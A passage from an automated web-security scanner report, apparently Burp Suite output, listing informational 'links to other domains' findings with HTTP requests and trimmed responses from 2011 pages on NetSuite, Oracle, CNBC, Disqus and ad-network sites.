<div class='bn_g_result_title'><a class='bn_g_result_link' href='http://www.netsuite.com/portal/products/netsuite/financials/financial-management.shtml' title='.../portal/products/netsuite/financials/financial-management.shtml' baynote_bnrank='1' baynote_guide='SimilarDocs' baynote_req='ContentGuide'>NetSuite Financial Management</a>
...[SNIP]...
<div class='bn_g_result_title'><a class='bn_g_result_link' href='http://www.netsuite.com/portal/products/netsuite/analytics/main.shtml' title='http://www.netsuite.com/portal/products/netsuite/analytics/main.shtml' baynote_bnrank='2' baynote_guide='SimilarDocs' baynote_req='ContentGuide'>Financial Analytics</a>
...[SNIP]...
<div class='bn_g_result_title'><a class='bn_g_result_link' href='http://www.netsuite.com/portal/products/netsuite/financial-planning/main.shtml' title='.../portal/products/netsuite/financial-planning/main.shtml' baynote_bnrank='3' baynote_guide='SimilarDocs' baynote_req='ContentGuide'>Financial Planning</a>
...[SNIP]...
<div class='bn_g_result_title'><a class='bn_g_result_link' href='http://www.netsuite.com/portal/products/netsuite/revenue-recognition/main.shtml' title='.../portal/products/netsuite/revenue-recognition/main.shtml' baynote_bnrank='4' baynote_guide='SimilarDocs' baynote_req='ContentGuide'>Revenue Recognition Management- NetSuite</a>
...[SNIP]...
<div class='bn_g_result_title'><a class='bn_g_result_link' href='http://www.netsuite.com/portal/products/netsuite/main.shtml' title='http://www.netsuite.com/portal/products/netsuite/main.shtml' baynote_bnrank='5' baynote_guide='SimilarDocs' baynote_req='ContentGuide'>NetSuite Solution Overview</a>
...[SNIP]...

19.55. http://netsuite-www.baynote.net/baynote/tags2/guide/results-products/netsuite-www

Summary

Severity:   Information
Confidence:   Certain
Host:   http://netsuite-www.baynote.net
Path:   /baynote/tags2/guide/results-products/netsuite-www

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /baynote/tags2/guide/results-products/netsuite-www?userId=6923713758307492964&customerId=netsuite&code=www&id=0&guide=ContentGuide&resultsPerPage=5&referrer=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fnetsuite%2Ffinancials%2Fmain.shtml&url=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fnetsuite%2Frevenue%2Fmain.shtml&appendParams=&rankParam=&condition=d%26g%26s&v=1 HTTP/1.1
Host: netsuite-www.baynote.net
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/products/netsuite/revenue/main.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: BNServer
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:44:22 GMT
Content-Length: 3621


bnTagManager.getTag(0).results = "<div class='bn_g_container' id='bn_guidecontainer0'><div class='bn_g_area' id='bn_guidearea0'><div class='bn_g_welcome' id='bn_guidewelcome0
...[SNIP]...
<div class='bn_g_result_title'><a class='bn_g_result_link' href='http://www.netsuite.com/portal/products/netsuite/revenue-recognition/main.shtml' title='.../portal/products/netsuite/revenue-recognition/main.shtml' baynote_bnrank='1' baynote_guide='SimilarDocs' baynote_req='ContentGuide'>Revenue Recognition Management- NetSuite</a>
...[SNIP]...
<div class='bn_g_result_title'><a class='bn_g_result_link' href='http://www.netsuite.com/portal/products/netsuite/analytics/main.shtml' title='http://www.netsuite.com/portal/products/netsuite/analytics/main.shtml' baynote_bnrank='2' baynote_guide='SimilarDocs' baynote_req='ContentGuide'>Financial Analytics</a>
...[SNIP]...
<div class='bn_g_result_title'><a class='bn_g_result_link' href='http://www.netsuite.com/portal/products/netsuite/financials/main.shtml' title='http://www.netsuite.com/portal/products/netsuite/financials/main.shtml' baynote_bnrank='3' baynote_guide='SimilarDocs' baynote_req='ContentGuide'>NetSuite Financials</a>
...[SNIP]...
<div class='bn_g_result_title'><a class='bn_g_result_link' href='http://www.netsuite.com/portal/management.shtml' title='http://www.netsuite.com/portal/management.shtml' baynote_bnrank='4' baynote_guide='SimilarDocs' baynote_req='ContentGuide'>Management Team</a>
...[SNIP]...
<div class='bn_g_result_title'><a class='bn_g_result_link' href='http://www.netsuite.com/portal/products/netsuite/financials/financial-management.shtml' title='.../portal/products/netsuite/financials/financial-management.shtml' baynote_bnrank='5' baynote_guide='SimilarDocs' baynote_req='ContentGuide'>NetSuite Financial Management</a>
...[SNIP]...

19.56. http://optimized-by.rubiconproject.com/a/dk.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.html

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^4^1315320939^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^2&11953^1; csi2=1295153.js^1^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; rdk=6451/11953; rdk15=0; ses15=9844^2&11953^7; csi15=2553663.js^4^1315321038^1315321139&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:59:04 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:59:04 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=2; expires=Tue, 06-Sep-2011 15:59:04 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^2&11953^7; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61255; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=1295121.js^2^1315321144^1315321144&2553663.js^4^1315321038^1315321139&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; expires=Tue, 13-Sep-2011 14:59:04 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1968

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
</script><img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=Television,NewsAndReference" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/><script defer="defer" type="text/javascript">
...[SNIP]...
</script><img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01" style="display: none;" border="0" height="1" width="1" alt=""/>
</body>
...[SNIP]...

19.57. https://oracleus.wingateweb.com/portal/newreg.ww

Summary

Severity:   Information
Confidence:   Certain
Host:   https://oracleus.wingateweb.com
Path:   /portal/newreg.ww

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /portal/newreg.ww?brand=jone&eve=ow&wt=ow HTTP/1.1
Host: oracleus.wingateweb.com
Connection: keep-alive
Referer: http://www.oracle.com/openworld/register/packages/index.html?src=7013425&Act=226
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:54:14 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: No-cache
Connection: Keep-Alive
Content-Length: 11209


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="expir
...[SNIP]...
<a href="http://www.omniture.com" title="Web Analytics"><img
src="https://102.112.2O7.net/b/ss/winweboracle/1/H.14--NS/0"
height="1" width="1" border="0" alt="" />
</a>
...[SNIP]...

19.58. http://readwriteenterprise.disqus.com/combination_widget.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://readwriteenterprise.disqus.com
Path:   /combination_widget.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /combination_widget.js?num_items=5&hide_mods=0&color=grey&default_tab=people&excerpt_length=200 HTTP/1.1
Host: readwriteenterprise.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: disqus_unique=608614822849; __qca=P0-943627109-1315055753168; __utma=113869458.1840189074.1315055753.1315100729.1315138435.4; __utmz=113869458.1315138435.4.4.utmcsr=scmagazine.com.au|utmccn=(referral)|utmcmd=referral|utmcct=/News/268907,kaspersky-website-vulnerable-to-xss.aspx

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Content-Length: 13329
Date: Tue, 06 Sep 2011 15:32:46 GMT
X-Varnish: 1225738715 1225689879
Age: 47
Via: 1.1 varnish
Connection: close


function dsqComboTab(tab) {
   document.getElementById('dsq-combo-people').style.display = "none";
   document.getElementById('dsq-combo-popular').style.display = "none";
   document.getElementById('dsq-
...[SNIP]...
<p class="dsq-widget-meta"><a href="http://www.readwriteweb.com/enterprise/2011/09/gartner-says-1b-market-for-soc.php">Gartner Says \\$1B Market for Social CRM by 2013</a>&nbsp;&middot;&nbsp;<a href="http://www.readwriteweb.com/enterprise/2011/09/gartner-says-1b-market-for-soc.php#comment-303517617">1 hour ago</a>
...[SNIP]...
<p class="dsq-widget-meta"><a href="http://www.readwriteweb.com/enterprise/2011/09/the-next-internet-whats-holdin.php">The Next Internet: What&#39;s Holding Us Back?</a>&nbsp;&middot;&nbsp;<a href="http://www.readwriteweb.com/enterprise/2011/09/the-next-internet-whats-holdin.php#comment-303496799">2 hours ago</a>
...[SNIP]...
<p class="dsq-widget-meta"><a href="http://www.readwriteweb.com/enterprise/2011/09/slow-down-rather-than-ban-stud.php">Slow Down, Rather Than Ban Student Facebook Access</a>&nbsp;&middot;&nbsp;<a href="http://www.readwriteweb.com/enterprise/2011/09/slow-down-rather-than-ban-stud.php#comment-303398752">7 hours ago</a>
...[SNIP]...
<p class="dsq-widget-meta"><a href="http://www.readwriteweb.com/enterprise/2011/09/slow-down-rather-than-ban-stud.php">Slow Down, Rather Than Ban Student Facebook Access</a>&nbsp;&middot;&nbsp;<a href="http://www.readwriteweb.com/enterprise/2011/09/slow-down-rather-than-ban-stud.php#comment-303039905">21 hours ago</a>
...[SNIP]...
<p class="dsq-widget-meta"><a href="http://www.readwriteweb.com/enterprise/2011/09/take-network-worlds-browser-te.php">Take Network World&#39;s Browser Test</a>&nbsp;&middot;&nbsp;<a href="http://www.readwriteweb.com/enterprise/2011/09/take-network-worlds-browser-te.php#comment-303006867">22 hours ago</a>
...[SNIP]...
<li class="dsq-clearfix">\
    <a class="dsq-widget-thread" href="http://www.readwriteweb.com/enterprise/2011/09/the-next-internet-whats-holdin.php">The Next Internet: What&#39;s Holding Us Back?</a>
...[SNIP]...
<li class="dsq-clearfix">\
    <a class="dsq-widget-thread" href="http://www.readwriteweb.com/enterprise/2011/09/slow-down-rather-than-ban-stud.php">Slow Down, Rather Than Ban Student Facebook Access</a>
...[SNIP]...
<li class="dsq-clearfix">\
    <a class="dsq-widget-thread" href="http://www.readwriteweb.com/enterprise/2011/08/as-steve-jobs-steps-down-linux.php">As Steve Jobs Steps Down, Linux Turns 20: Which Changed the World More?</a>
...[SNIP]...
<li class="dsq-clearfix">\
    <a class="dsq-widget-thread" href="http://www.readwriteweb.com/enterprise/2011/09/gartner-says-1b-market-for-soc.php">Gartner Says \\$1B Market for Social CRM by 2013</a>
...[SNIP]...
<li class="dsq-clearfix">\
    <a class="dsq-widget-thread" href="http://www.readwriteweb.com/enterprise/2011/09/take-network-worlds-browser-te.php">Take Network World&#39;s Browser Test</a>
...[SNIP]...

19.59. http://search.cnbc.com/main.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.cnbc.com
Path:   /main.do

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

POST /main.do?target=all&keywords=xss&categories=exclude HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
Content-Length: 18
Cache-Control: max-age=0
Origin: http://www.cnbc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; adops_master_kvs=; snas_noinfo=1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315339005443; __qseg=Q_D

searchboxinput=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:00 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 aicache6
Content-Length: 84619
X-Aicache-OS: 64.210.194.248:80
Connection: Keep-Alive
Keep-Alive: max=20

<html>
<head>
<!-- Adding velocity template for meta tags -->

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss">
<meta name=
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/id/29755670">
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js?rti=200914"></script>
...[SNIP]...
<!-- Pixelman Tracking -->
<script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
<div style="height:1px; line-height:1px;">
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="1" height="1" id="flashQuoteProxy" align="middle">
<param name="allowScriptAccess" value="always">
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<div pcid="0" style="padding-bottom:px;"><script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<div class="cnbc_submenutitle">
<a style="color: rgb(255, 255, 255); text-decoration: none; margin-top: 3px; margin-left: -5px;"
class="cnbc_submenutitle" onmouseover="this.style.color='#FFDF0A'" onmouseout="this.style.color='#FFFFFF'"
href="http://www.nbcuniversalstore.com/index.php?v=cnbc_original-productions">
DVDs</a>
...[SNIP]...
<div class="cnbc_submenutitle">
<a style="color: rgb(255, 255, 255); text-decoration: none; margin-top: 3px; margin-left: -5px;"
class="cnbc_submenutitle" onmouseover="this.style.color='#FFDF0A'" onmouseout="this.style.color='#FFFFFF'"
href="http://www.nbcuniversalstore.com/?v=cnbc">
Merchandise</a>
...[SNIP]...
<!-- Pixelman Tracking -->
<script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

19.60. http://search.oracle.com/search/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.oracle.com
Path:   /search/search

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /search/search?search.timezone=300&search_startnum=&search_endnum=&num=10&search_dupid=&exttimeout=false&group=All&q=sql+syntax+help&search_p_main_operator=all&search_p_atname=&search_p_op=equals&search_p_val=&search_p_atname=&search_p_op=equals&search_p_val=&btnSearch=Search HTTP/1.1
Host: search.oracle.com
Proxy-Connection: keep-alive
Referer: http://search.oracle.com/search/search?default=true&keyword=phone&start=1&nodeid=&fid=&showSimilarDoc=true&group=All
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d920c7f1e6cd9839230afb44aa089e4c8ac2d20e3ca; ses.qapp.sg_tab_name=All; BIGipServerses_ext_prod_pool=2131530381.30494.0000; s_cc=true; s_nr=1315342484651; gpv_p24=http%3A//search.oracle.com/search/search%3Fdefault%3Dtrue%26keyword%3Dphone%26start%3D1%26nodeid%3D%26fid%3D%26showSimilarDoc%3Dtrue%26group%3DAll; gpw_e24=http%3A//search.oracle.com/search/search%3Fdefault%3Dtrue%26keyword%3Dphone%26start%3D1%26nodeid%3D%26fid%3D%26showSimilarDoc%3Dtrue%26group%3DAll; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253DSearch%25253A%252520All%25253A%252520Query%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT%26oracleopenworld%3D%2526pid%253DSearch%25253A%252520OpenWorld%25253A%252520No%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.oracle.com/sitemaps/sitemaps.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=0
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.2 (TN;ecid=105646725015,0)
Content-Length: 57009
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:54:47 GMT
Connection: close
Set-Cookie: JSESSIONID=94577a1c1e6cbc3ca73079c24bb4a5b6833c56849462; path=/search
Set-Cookie: ses.qapp.sg_tab_name=All; HttpOnly



...[SNIP]...
<span class="title"><a href="http://dev.mysql.com/news-and-events/newsletter/2008/2008-12.html" target="_blank">MySQL :: MySQL Newsletter December 2008</a>
...[SNIP]...

19.61. http://serve.directdigitalllc.com/serve.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://serve.directdigitalllc.com
Path:   /serve.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg= HTTP/1.1
Host: serve.directdigitalllc.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342934886&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 16:02:18 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 9400

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<style>
/* begin reset */
html {margin:0;padding:0;border:0;}
body, div, span, object, ifram
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=125%2C104%2C75&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/kdcnz258in.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=125%2C104%2C75&t=11">Your Brain is Starving</a></span>
<a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=125%2C104%2C75&t=11">You must see this terrifying brain secret before it's too late... <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(104, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg=https://crm.directdigitalllc.com/click?a=104&b=26&p=125%2C104%2C75&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/58k58g8oxm.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(104, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg=https://crm.directdigitalllc.com/click?a=104&b=26&p=125%2C104%2C75&t=11">1 Secret To Joint Relief</a></span>
<a onclick="javascript:trackClick(104, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg=https://crm.directdigitalllc.com/click?a=104&b=26&p=125%2C104%2C75&t=11">This ridiculously easy way to relieve joints will leave you amazed... <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=125%2C104%2C75&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/j0c08ui84r.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=125%2C104%2C75&t=11">1 Easy Way To Feel Happy</a></span>
<a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=125%2C104%2C75&t=11">Boston researchers have discovered the secret to happier living. <br />
...[SNIP]...

19.62. http://serve.directdigitalllc.com/serve.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://serve.directdigitalllc.com
Path:   /serve.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg= HTTP/1.1
Host: serve.directdigitalllc.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342624689&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
